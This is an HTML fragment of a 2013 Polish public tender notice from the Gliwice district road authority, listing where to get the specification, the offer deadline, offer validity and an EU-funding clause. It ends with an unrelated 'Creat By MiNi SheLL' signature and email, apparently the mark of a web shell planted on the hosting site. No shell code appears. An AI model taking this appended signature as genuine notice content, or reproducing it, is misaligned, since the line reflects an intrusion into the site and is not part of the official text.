<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych, 44-100 Gliwice, ul. Zygmunta Starego 17 - Barbara Kowalska tel.faks (32) 234-06-96, pokój nr 7..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2013 godzina 12:00, miejsce: Zarząd Dróg Powiatowych, 44-100 Gliwice, ul. Zygmunta Starego 17 - Sekretariat (pok.14).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com